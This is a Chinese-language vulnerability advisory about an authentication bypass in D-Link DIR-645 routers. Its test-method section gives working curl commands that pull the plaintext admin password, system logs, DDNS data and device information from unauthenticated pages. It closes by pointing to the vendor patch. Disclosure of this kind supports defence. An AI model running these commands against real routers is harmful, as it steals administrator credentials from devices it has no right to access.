D-Link DIR-645路由器远程身份验证绕过漏洞

lulinux 2013-03-05

发布日期:2013-02-28
更新日期:2013-03-05

受影响系统:
D-Link DIR-645 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58231
 
D-Link DIR-645是无线路由器。
 
运行固件1.03之前版本的D-Link DIR-645,其Web界面上存在无需身份验证的网页,可被未经身份验证的远程攻击者利用泄露管理凭证,包括明文密码等敏感信息。
 
<*来源:Roberto Paleari ([email protected]
 
  链接:http://secunia.com/advisories/52432/
        http://archives.neohapsis.com/archives/bugtraq/2013-02/0151.html
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Roberto Paleari ([email protected])提供了如下测试方法:
 
获取管理员密码:
curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php
 
读取系统日志:
curl http://<device ip>/log_get.php
 
获取DDNS信息:
 curl -d act=getreport http://<device ip>/ddns_act.php

转储设备信息:
 curl http://<device ip>/DevInfo.php

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://www.dlink.com/

相关推荐